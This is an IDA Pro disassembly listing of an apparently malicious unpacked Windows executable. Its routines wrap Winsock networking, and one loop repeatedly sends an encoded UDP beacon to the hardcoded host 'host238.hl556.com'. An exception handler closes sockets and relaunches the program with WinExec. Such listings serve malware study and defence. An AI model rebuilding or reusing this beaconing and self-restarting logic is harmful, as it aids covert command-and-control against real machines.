;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 47D9804FF0114CE81BB9E7171C77D1DF
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure data
HEADER segment page public 'DATA' use32
assume cs:HEADER
;org 400000h
__ImageBase dd 5A4Dh ; DATA XREF: sub_405073+3E�o
; sub_405073:loc_405118�r
dd 2 dup(0)
dd 4550h, 3014Ch, 21475346h, 2 dup(0)
dd 10F00E0h, 10Bh, 9000h, 7000h, 0
dd 154h, 1000h, 0Ch, 400000h, 1000h, 200h, 4, 0
dd 4, 0
dd 19200h, 200h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 2 dup(0)
dd 19000h, 84h, 1Eh dup(0)
dd 11000h, 1000h, 11000h, 1000h, 3 dup(0)
dd 0C00000E0h, 2 dup(0)
dd 7000h, 12000h, 7000h, 12000h, 3 dup(0)
dd 0C00000E0h
; ---------------------------------------------------------------------------
;
; The code at 400000..401000 is hidden from normal disassembly
; and was loaded because the user ordered to load it explicitly
;
; <<<< IT MAY CONTAIN TROJAN HORSES, VIRUSES, AND DO HARMFUL THINGS >>>
;
;
public start
start:
imul esp, cs:[ecx+74h], 3261h
adc [eax], al
; ---------------------------------------------------------------------------
db 0
dword_400160 dd 19000h, 200h, 19000h, 1F7313FFh, 0B04180B6h, 1213FF10h
dd 0C0000040h, 0E0EBAA3Ah, 20853FFh, 1D983F6h, 53FF0E75h
dd 0AC24EB04h, 2D74E8D1h, 18EBC913h, 0E0C14891h, 53FFAC08h
dd 0F8433B04h, 0FC800A73h, 83067305h, 2777FF8h, 8B954141h
dd 5600B6C5h, 0F02BF78Bh, 0EB5EA4F3h, 97AD5E9Fh, 53FF50ADh
dd 78B9510h, 75F37840h, 0C63FF03h, 53FF5550h, 0EEEBAB14h
dd 0FF41C933h, 0FFC91313h, 0C3F87213h, 575D202h, 1246168Ah
dd 454BC3D2h, 4C454E52h, 642E3233h, 6C6Ch
align 1000h
HEADER ends
; File Name : u:\work\47d9804ff0114ce81bb9e7171c77d1df_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00011000 ( 69632.)
; Section size in file : 00011000 ( 69632.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
seg001 segment para public 'BSS' use32
assume cs:seg001
;org 401000h
assume es:nothing, ss:nothing, ds:seg001, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
sub_401000 proc near ; CODE XREF: sub_4018FD+AB4�p
; DATA XREF: seg002:00417FAC�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_40100E
push 7
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40100E: ; CODE XREF: sub_401000+7�j
and dword ptr [esi+10h], 0
and dword_40E3F8, 0
lea eax, [esi+28h]
push 10h
push eax
push dword ptr [esi+8]
call sub_403422 ; connect
test eax, eax
jz short loc_40105B
call sub_40341C ; WSAGetLastError
cmp eax, 2748h
jz short loc_40105B
call sub_40341C ; WSAGetLastError
cmp eax, 2735h
jz short loc_401053
call sub_40341C ; WSAGetLastError
cmp eax, 2733h
jz short loc_401053
push 2
jmp short loc_401055
; ---------------------------------------------------------------------------
loc_401053: ; CODE XREF: sub_401000+41�j
; sub_401000+4D�j
push 6
loc_401055: ; CODE XREF: sub_401000+51�j
pop eax
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40105B: ; CODE XREF: sub_401000+29�j
; sub_401000+35�j
and dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401063 proc near ; CODE XREF: sub_4018FD+4EA�p
; sub_4018FD+725�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
push 1
pop edi
test esi, esi
mov [ebp+var_4], edi
jnz short loc_40107F
push 7
pop eax
jmp loc_401113
; ---------------------------------------------------------------------------
loc_40107F: ; CODE XREF: sub_401063+12�j
and dword ptr [esi+10h], 0
and dword ptr [esi+24h], 0
push 6
push edi
push 2
call sub_40342E ; socket
test eax, eax
mov [esi+8], eax
jge short loc_4010A0
push 3
pop eax
mov [esi+0Ch], eax
jmp short loc_401113
; ---------------------------------------------------------------------------
loc_4010A0: ; CODE XREF: sub_401063+33�j
mov ebx, [ebp+arg_4]
push ebx
call sub_4033FE ; inet_addr
test eax, eax
jz short loc_4010C3
push ebx
call sub_4033FE ; inet_addr
cmp eax, 0FFFFFFFFh
jz short loc_4010C3
push ebx
call sub_4033FE ; inet_addr
mov [esi+2Ch], eax
jmp short loc_4010EA
; ---------------------------------------------------------------------------
loc_4010C3: ; CODE XREF: sub_401063+48�j
; sub_401063+53�j
push ebx
call sub_4033F8 ; gethostbyname
test eax, eax
jnz short loc_4010D4
mov [esi+0Ch], edi
mov eax, edi
jmp short loc_401113
; ---------------------------------------------------------------------------
loc_4010D4: ; CODE XREF: sub_401063+68�j
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [esi+2Ch]
push eax
call sub_403510
add esp, 0Ch
loc_4010EA: ; CODE XREF: sub_401063+5E�j
push [ebp+arg_8]
mov word ptr [esi+28h], 2
call sub_403416 ; htons
mov [esi+2Ah], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push dword ptr [esi+8]
call sub_403428 ; ioctlsocket
and dword ptr [esi+0Ch], 0
xor eax, eax
loc_401113: ; CODE XREF: sub_401063+17�j
; sub_401063+3B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401063 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401118 proc near ; CODE XREF: sub_4018FD+9D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
mov esi, [ebp+arg_0]
push 1
pop eax
test esi, esi
mov [ebp+var_4], eax
jnz short loc_40112F
push 7
pop eax
jmp short loc_4011A2
; ---------------------------------------------------------------------------
loc_40112F: ; CODE XREF: sub_401118+10�j
and dword ptr [esi+10h], 0
push 6
push eax
push 2
call sub_40342E ; socket
test eax, eax
mov [esi+8], eax
jge short loc_401148
push 3
jmp short loc_401185
; ---------------------------------------------------------------------------
loc_401148: ; CODE XREF: sub_401118+2A�j
and dword ptr [esi+2Ch], 0
push edi
push [ebp+arg_4]
lea edi, [esi+28h]
mov word ptr [edi], 2
call sub_403416 ; htons
push 10h
push edi
push dword ptr [esi+8]
mov [esi+2Ah], ax
call sub_403410 ; bind
test eax, eax
pop edi
jge short loc_401175
push 4
jmp short loc_401185
; ---------------------------------------------------------------------------
loc_401175: ; CODE XREF: sub_401118+57�j
push 32h
push dword ptr [esi+8]
call sub_403434 ; listen
test eax, eax
jge short loc_40118B
push 5
loc_401185: ; CODE XREF: sub_401118+2E�j
; sub_401118+5B�j
pop eax
mov [esi+0Ch], eax
jmp short loc_4011A2
; ---------------------------------------------------------------------------
loc_40118B: ; CODE XREF: sub_401118+69�j
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push dword ptr [esi+8]
call sub_403428 ; ioctlsocket
and dword ptr [esi+0Ch], 0
xor eax, eax
loc_4011A2: ; CODE XREF: sub_401118+15�j
; sub_401118+71�j
pop esi
leave
retn
sub_401118 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4011A5 proc near ; CODE XREF: sub_4018FD+1F9�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
test esi, esi
push edi
jz short loc_401209
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_401209
and dword ptr [esi+10h], 0
push 3Ch
push esi
push edi
mov [ebp+arg_0], 10h
call sub_403510
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [edi+28h]
push eax
push dword ptr [esi+8]
call sub_40343A ; accept
test eax, eax
jge short loc_4011F8
push 3Ch
push 0
push edi
call sub_403AC0
add esp, 0Ch
push 6
pop eax
mov [esi+0Ch], eax
jmp short loc_40120C
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: sub_4011A5+3C�j
mov [edi+8], eax
mov eax, [ebp+arg_0]
and dword ptr [esi+0Ch], 0
mov [esi+10h], eax
xor eax, eax
jmp short loc_40120C
; ---------------------------------------------------------------------------
loc_401209: ; CODE XREF: sub_4011A5+A�j
; sub_4011A5+11�j
push 7
pop eax
loc_40120C: ; CODE XREF: sub_4011A5+51�j
; sub_4011A5+62�j
pop edi
pop esi
pop ebp
retn
sub_4011A5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401210 proc near ; CODE XREF: sub_401318+75�p
; sub_4018FD+2D9�p ...
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
mov [ebp+var_C], ebx
jnz short loc_401230
push 7
pop eax
jmp loc_401313
; ---------------------------------------------------------------------------
loc_401230: ; CODE XREF: sub_401210+16�j
mov eax, [esi+24h]
mov edi, [ebp+arg_8]
add eax, edi
push eax
call sub_40345E
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_401313
mov ecx, [esi+24h]
push edi
push [ebp+arg_4]
add ecx, eax
push ecx
call sub_403510
mov eax, [esi+1Ch]
add esp, 0Ch
cmp eax, ebx
jz short loc_401286
push dword ptr [esi+24h]
push eax
push [ebp+arg_0]
call sub_403510
mov eax, [esi+1Ch]
add esp, 0Ch
cmp eax, ebx
jz short loc_401283
push eax
call sub_403B18
pop ecx
mov [esi+1Ch], ebx
loc_401283: ; CODE XREF: sub_401210+67�j
mov [esi+1Ch], ebx
loc_401286: ; CODE XREF: sub_401210+51�j
mov eax, [esi+8]
add edi, [esi+24h]
mov [ebp+var_10C], eax
push 8
lea eax, [ebp+var_8]
push ebx
push eax
mov [esi+24h], ebx
mov [ebp+var_110], 1
call sub_403AC0
add esp, 0Ch
lea eax, [ebp+var_8]
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
push eax
lea eax, [ebp+var_110]
push ebx
push eax
mov eax, [esi+8]
push ebx
inc eax
push eax
call sub_40340A ; select
test eax, eax
jle short loc_4012EB
push ebx
push edi
push [ebp+arg_0]
mov [esi+10h], ebx
mov dword_40E3F8, ebx
push dword ptr [esi+8]
call sub_403440 ; send
cmp eax, edi
jnb short loc_401302
jmp short loc_4012EE
; ---------------------------------------------------------------------------
loc_4012EB: ; CODE XREF: sub_401210+BD�j
mov eax, [ebp+var_C]
loc_4012EE: ; CODE XREF: sub_401210+D9�j
mov ecx, [ebp+arg_0]
push 6
mov [esi+10h], eax
pop eax
mov [esi+24h], edi
mov [esi+1Ch], ecx
mov [esi+0Ch], eax
jmp short loc_401313
; ---------------------------------------------------------------------------
loc_401302: ; CODE XREF: sub_401210+D7�j
push [ebp+arg_0]
mov [esi+10h], eax
mov [esi+0Ch], ebx
call sub_403B18
pop ecx
xor eax, eax
loc_401313: ; CODE XREF: sub_401210+1B�j
; sub_401210+34�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401210 endp
; =============== S U B R O U T I N E =======================================
sub_401318 proc near ; CODE XREF: sub_4018FD+B39�p
; sub_4018FD+BC9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
mov esi, 0BBBh
loc_40131E: ; CODE XREF: sub_401318+5D�j
mov eax, dword_40E3EC
test eax, eax
jz short loc_401335
push eax
call sub_403B18
and dword_40E3EC, 0
pop ecx
loc_401335: ; CODE XREF: sub_401318+D�j
lea eax, [esi+1]
push eax
call sub_40345E
test eax, eax
pop ecx
mov dword_40E3EC, eax
jz short loc_4013B2
push esi
push 0
push eax
call sub_403AC0
lea eax, [esp+10h+arg_8]
push eax
lea eax, [esi-2]
push [esp+14h+arg_4]
push eax
push dword_40E3EC
call sub_403C0B
add esp, 1Ch
add esi, 3E8h
cmp eax, 0FFFFFFFFh
jz short loc_40131E
push dword_40E3EC
call sub_403B90
push eax
push dword_40E3EC
push [esp+10h+arg_0]
call sub_401210
mov esi, eax
mov eax, dword_40E3EC
add esp, 10h
test eax, eax
jz short loc_4013AE
push eax
call sub_403B18
and dword_40E3EC, 0
pop ecx
loc_4013AE: ; CODE XREF: sub_401318+86�j
mov eax, esi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4013B2: ; CODE XREF: sub_401318+2E�j
xor eax, eax
pop esi
retn
sub_401318 endp
; =============== S U B R O U T I N E =======================================
sub_4013B6 proc near ; CODE XREF: sub_4018FD+317�p
; sub_4018FD+941�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_4013C4
push 7
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4013C4: ; CODE XREF: sub_4013B6+7�j
push 0
and dword ptr [esi+10h], 0
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push dword ptr [esi+8]
call sub_403446 ; recv
test eax, eax
jge short loc_4013EE
call sub_40341C ; WSAGetLastError
cmp eax, 2734h
jnz short loc_4013F7
push 6
jmp short loc_4013F9
; ---------------------------------------------------------------------------
loc_4013EE: ; CODE XREF: sub_4013B6+26�j
jnz short loc_4013FF
cmp [esp+4+arg_8], 0
jz short loc_4013FF
loc_4013F7: ; CODE XREF: sub_4013B6+32�j
push 8
loc_4013F9: ; CODE XREF: sub_4013B6+36�j
pop eax
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_4013FF: ; CODE XREF: sub_4013B6:loc_4013EE�j
; sub_4013B6+3F�j
and dword ptr [esi+0Ch], 0
mov [esi+10h], eax
xor eax, eax
pop esi
retn
sub_4013B6 endp
; =============== S U B R O U T I N E =======================================
sub_40140A proc near ; CODE XREF: sub_401635+298�p
; sub_401635+2AE�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_40141B
push 7
pop eax
jmp short loc_401468
; ---------------------------------------------------------------------------
loc_40141B: ; CODE XREF: sub_40140A+A�j
push dword ptr [esi+8]
mov [esi+10h], edi
call sub_40344C ; closesocket
test eax, eax
jge short loc_401432
push 8
pop eax
mov [esi+0Ch], eax
jmp short loc_401468
; ---------------------------------------------------------------------------
loc_401432: ; CODE XREF: sub_40140A+1E�j
mov eax, [esi+1Ch]
mov [esi+8], edi
cmp eax, edi
mov [esi+0Ch], edi
jz short loc_401449
push eax
call sub_403B18
pop ecx
mov [esi+1Ch], edi
loc_401449: ; CODE XREF: sub_40140A+33�j
mov eax, [esi+20h]
cmp eax, edi
jz short loc_40145A
push eax
call sub_403B18
pop ecx
mov [esi+20h], edi
loc_40145A: ; CODE XREF: sub_40140A+44�j
push 3Ch
push edi
push esi
call sub_403AC0
add esp, 0Ch
xor eax, eax
loc_401468: ; CODE XREF: sub_40140A+F�j
; sub_40140A+26�j
pop edi
pop esi
retn
sub_40140A endp
; =============== S U B R O U T I N E =======================================
sub_40146B proc near ; CODE XREF: sub_401586+18�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
push edi
jnz short loc_40147A
push 7
pop eax
jmp short loc_4014F9
; ---------------------------------------------------------------------------
loc_40147A: ; CODE XREF: sub_40146B+8�j
and dword ptr [esi+10h], 0
push 11h
push 2
push 2
call sub_40342E ; socket
test eax, eax
mov [esi+8], eax
jge short loc_401494
push 3
jmp short loc_4014C4
; ---------------------------------------------------------------------------
loc_401494: ; CODE XREF: sub_40146B+23�j
mov edi, [esp+8+arg_4]
push edi
call sub_4033FE ; inet_addr
test eax, eax
jz short loc_4014B8
push edi
call sub_4033FE ; inet_addr
cmp eax, 0FFFFFFFFh
jz short loc_4014B8
push edi
call sub_4033FE ; inet_addr
mov [esi+2Ch], eax
jmp short loc_4014E0
; ---------------------------------------------------------------------------
loc_4014B8: ; CODE XREF: sub_40146B+35�j
; sub_40146B+40�j
push edi
call sub_4033F8 ; gethostbyname
test eax, eax
jnz short loc_4014CA
push 1
loc_4014C4: ; CODE XREF: sub_40146B+27�j
pop eax
mov [esi+0Ch], eax
jmp short loc_4014F9
; ---------------------------------------------------------------------------
loc_4014CA: ; CODE XREF: sub_40146B+55�j
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [esi+2Ch]
push eax
call sub_403510
add esp, 0Ch
loc_4014E0: ; CODE XREF: sub_40146B+4B�j
push [esp+8+arg_8]
mov word ptr [esi+28h], 2
call sub_403416 ; htons
and dword ptr [esi+0Ch], 0
mov [esi+2Ah], ax
xor eax, eax
loc_4014F9: ; CODE XREF: sub_40146B+D�j
; sub_40146B+5D�j
pop edi
pop esi
retn
sub_40146B endp
; =============== S U B R O U T I N E =======================================
sub_4014FC proc near ; CODE XREF: sub_401586+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_40150A
push 7
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40150A: ; CODE XREF: sub_4014FC+7�j
lea eax, [esi+28h]
and dword ptr [esi+10h], 0
push 10h
and dword_40E3F8, 0
push eax
push 0
push [esp+10h+arg_8]
push [esp+14h+arg_4]
push dword ptr [esi+8]
call sub_403452 ; sendto
test eax, eax
jg short loc_401549
call sub_40341C ; WSAGetLastError
cmp eax, 2734h
jnz short loc_401541
push 6
jmp short loc_401543
; ---------------------------------------------------------------------------
loc_401541: ; CODE XREF: sub_4014FC+3F�j
push 8
loc_401543: ; CODE XREF: sub_4014FC+43�j
pop eax
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401549: ; CODE XREF: sub_4014FC+33�j
and dword ptr [esi+0Ch], 0
mov [esi+10h], eax
xor eax, eax
pop esi
retn
sub_4014FC endp
; =============== S U B R O U T I N E =======================================
sub_401554 proc near ; CODE XREF: sub_401586+97�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_401562
push 7
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401562: ; CODE XREF: sub_401554+7�j
push dword ptr [esi+8]
and dword ptr [esi+10h], 0
call sub_40344C ; closesocket
test eax, eax
jge short loc_40157A
push 8
pop eax
mov [esi+0Ch], eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40157A: ; CODE XREF: sub_401554+1C�j
and dword ptr [esi+8], 0
and dword ptr [esi+0Ch], 0
xor eax, eax
pop esi
retn
sub_401554 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_401586 proc near ; DATA XREF: sub_4018FD+B1�o
var_13C = byte ptr -13Ch
var_3C = byte ptr -3Ch
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
loc_401590: ; CODE XREF: sub_401586+AA�j
push 800Eh
lea eax, [ebp+var_3C]
push offset aHost238_hl556_ ; "host238.hl556.com"
push eax
call sub_40146B
add esp, 0Ch
test eax, eax
jnz short loc_401625
movzx eax, word_40E684
push eax
lea eax, [ebp+var_13C]
push offset dword_40B030
push eax
call sub_403C5B
lea eax, [ebp+var_13C]
xor esi, esi
push eax
call sub_403B90
add esp, 10h
test eax, eax
jbe short loc_4015FC
loc_4015D8: ; CODE XREF: sub_401586+74�j
mov cl, [ebp+esi+var_13C]
lea eax, [ebp+esi+var_13C]
shl cl, 1
mov [eax], cl
lea eax, [ebp+var_13C]
push eax
inc esi
call sub_403B90
cmp esi, eax
pop ecx
jb short loc_4015D8
loc_4015FC: ; CODE XREF: sub_401586+50�j
lea eax, [ebp+var_13C]
push eax
call sub_403B90
push eax
lea eax, [ebp+var_13C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_4014FC
lea eax, [ebp+var_3C]
push eax
call sub_401554
add esp, 14h
loc_401625: ; CODE XREF: sub_401586+22�j
push 0DBBA0h
call dword_40A0B8 ; Sleep
jmp loc_401590
sub_401586 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401635 proc near ; CODE XREF: seg001:00402590�p
var_A00 = byte ptr -0A00h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A00h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push 800h
push 0
mov eax, [edi]
mov ebx, [eax+0Ch]
mov esi, [eax]
lea eax, [ebp+var_A00]
push eax
call sub_403AC0
mov eax, 0C0000025h
add esp, 0Ch
cmp esi, eax
ja loc_4017A0
jz loc_401796
mov eax, 80000002h
cmp esi, eax
ja loc_40170B
jz short loc_401701
test esi, esi
jz short loc_4016F7
cmp esi, 80h
jz short loc_4016ED
cmp esi, 0C0h
jz short loc_4016E3
cmp esi, 102h
jz short loc_4016D9
cmp esi, 103h
jz short loc_4016CF
cmp esi, 40000005h
jz short loc_4016C5
cmp esi, 80000001h
jnz loc_401854
push offset aGuardPageViola ; "Guard Page Violation"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4016C5: ; CODE XREF: sub_401635+78�j
push offset aSegmentNotific ; "Segment Notification"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4016CF: ; CODE XREF: sub_401635+70�j
push offset aPending ; "Pending"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4016D9: ; CODE XREF: sub_401635+68�j
push offset aTimeout ; "Timeout"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4016E3: ; CODE XREF: sub_401635+60�j
push offset aUserApc ; "User APC"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4016ED: ; CODE XREF: sub_401635+58�j
push offset aAbandonedWait0 ; "Abandoned Wait 0"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4016F7: ; CODE XREF: sub_401635+50�j
push offset aWait0 ; "Wait 0"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_401701: ; CODE XREF: sub_401635+4C�j
push offset aDataTypeMisali ; "Data Type Misalignment"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_40170B: ; CODE XREF: sub_401635+46�j
cmp esi, 80000003h
jz short loc_40178C
cmp esi, 80000004h
jz short loc_40178C
cmp esi, 0C0000005h
jz short loc_40175D
cmp esi, 0C0000006h
jz short loc_401753
cmp esi, 0C0000017h
jz short loc_401749
cmp esi, 0C000001Dh
jnz loc_401854
push offset aIllegalInstruc ; "Illegal Instruction"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_401749: ; CODE XREF: sub_401635+FC�j
push offset aNoMemory ; "No Memory"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_401753: ; CODE XREF: sub_401635+F4�j
push offset aInPageError ; "In Page Error"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_40175D: ; CODE XREF: sub_401635+EC�j
mov eax, [edi]
mov ecx, offset aWritingTo ; "writing to"
cmp dword ptr [eax+14h], 0
jnz short loc_40176F
mov ecx, offset aReadingFrom ; "reading from"
loc_40176F: ; CODE XREF: sub_401635+133�j
push dword ptr [eax+18h]
lea eax, [ebp+var_100]
push ecx
push offset aAccessViolatio ; "Access Violation %s 0x%08x"
push eax
call sub_403C5B
add esp, 10h
jmp loc_401891
; ---------------------------------------------------------------------------
loc_40178C: ; CODE XREF: sub_401635+DC�j
; sub_401635+E4�j
pop edi
pop esi
mov eax, 80010001h
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401796: ; CODE XREF: sub_401635+39�j
push offset aNoncontinuable ; "Noncontinuable Exception"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4017A0: ; CODE XREF: sub_401635+33�j
mov eax, 0C0000092h
cmp esi, eax
ja short loc_401824
jz short loc_40181D
cmp esi, 0C0000026h
jz short loc_401816
cmp esi, 0C000008Ch
jz short loc_40180F
cmp esi, 0C000008Dh
jz short loc_401808
cmp esi, 0C000008Eh
jz short loc_401801
cmp esi, 0C000008Fh
jz short loc_4017F7
cmp esi, 0C0000090h
jz short loc_4017ED
cmp esi, 0C0000091h
jnz short loc_401854
push offset aFloatOverflow ; "Float Overflow"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4017ED: ; CODE XREF: sub_401635+1A4�j
push offset aFloatInvalidOp ; "Float Invalid Operation"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_4017F7: ; CODE XREF: sub_401635+19C�j
push offset aFloatInexactRe ; "Float Inexact Result"
jmp loc_401883
; ---------------------------------------------------------------------------
loc_401801: ; CODE XREF: sub_401635+194�j
push offset aDivideByZero ; "Divide by Zero"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_401808: ; CODE XREF: sub_401635+18C�j
push offset aFloatDenormalO ; "Float Denormal Operand"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_40180F: ; CODE XREF: sub_401635+184�j
push offset aArrayBoundsExc ; "Array Bounds Exceeded"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_401816: ; CODE XREF: sub_401635+17C�j
push offset aInvalidDisposi ; "Invalid Disposition"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_40181D: ; CODE XREF: sub_401635+174�j
push offset aFloatStackChec ; "Float Stack Check"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_401824: ; CODE XREF: sub_401635+172�j
cmp esi, 0C0000093h
jz short loc_40187E
cmp esi, 0C0000094h
jz short loc_401877
cmp esi, 0C0000095h
jz short loc_401870
cmp esi, 0C0000096h
jz short loc_401869
cmp esi, 0C00000FDh
jz short loc_401862
cmp esi, 0C000013Ah
jz short loc_40185B
loc_401854: ; CODE XREF: sub_401635+80�j
; sub_401635+104�j ...
push offset aUnknownExcepti ; "Unknown exception"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_40185B: ; CODE XREF: sub_401635+21D�j
push offset aCtrlCExit ; "Ctrl+C Exit"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_401862: ; CODE XREF: sub_401635+215�j
push offset aStackOverflow ; "Stack Overflow"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_401869: ; CODE XREF: sub_401635+20D�j
push offset aPrivilegedInst ; "Privileged Instruction"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_401870: ; CODE XREF: sub_401635+205�j
push offset aIntegerOverflo ; "Integer Overflow"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_401877: ; CODE XREF: sub_401635+1FD�j
push offset aIntegerDivideB ; "Integer Divide by Zero"
jmp short loc_401883
; ---------------------------------------------------------------------------
loc_40187E: ; CODE XREF: sub_401635+1F5�j
push offset aFloatUderflow ; "Float Uderflow"
loc_401883: ; CODE XREF: sub_401635+8B�j
; sub_401635+95�j ...
lea eax, [ebp+var_100]
push eax
call sub_403CB0
pop ecx
pop ecx
loc_401891: ; CODE XREF: sub_401635+152�j
lea eax, [ebp+var_100]
push ebx
push eax
lea eax, [ebp+var_A00]
push offset aExceptionSAtAd ; "Exception: %s at address 0x%08x in win3"...
push eax
call sub_403C5B
add esp, 10h
lea eax, [ebp+var_200]
xor edi, edi
push 100h
push eax
push edi
call dword_40A0C0 ; GetModuleFileNameA
mov esi, offset dword_40E6C0
loc_4018C7: ; CODE XREF: sub_401635+2A7�j
cmp [esi+8], edi
jle short loc_4018D3
push esi
call sub_40140A
pop ecx
loc_4018D3: ; CODE XREF: sub_401635+295�j
add esi, 3Ch
cmp esi, offset dword_40F278
jb short loc_4018C7
push offset dword_40F280
call sub_40140A
pop ecx
lea eax, [ebp+var_200]
push edi
push eax
call dword_40A0BC ; WinExec
push edi
call sub_403901
sub_401635 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4018FD proc near ; CODE XREF: sub_4032B7+3E�j
var_21AC = dword ptr -21ACh
var_21A8 = dword ptr -21A8h
var_21A4 = dword ptr -21A4h
var_21A0 = dword ptr -21A0h
var_219C = dword ptr -219Ch
var_2198 = dword ptr -2198h
var_2194 = byte ptr -2194h
var_1194 = dword ptr -1194h
var_1190 = dword ptr -1190h
var_118C = byte ptr -118Ch
var_108C = dword ptr -108Ch
var_1088 = dword ptr -1088h
var_1084 = byte ptr -1084h
var_F84 = dword ptr -0F84h
var_F80 = dword ptr -0F80h
var_E80 = dword ptr -0E80h
var_E7C = dword ptr -0E7Ch
var_D7C = dword ptr -0D7Ch
var_D78 = dword ptr -0D78h
var_D74 = byte ptr -0D74h
var_D73 = byte ptr -0D73h
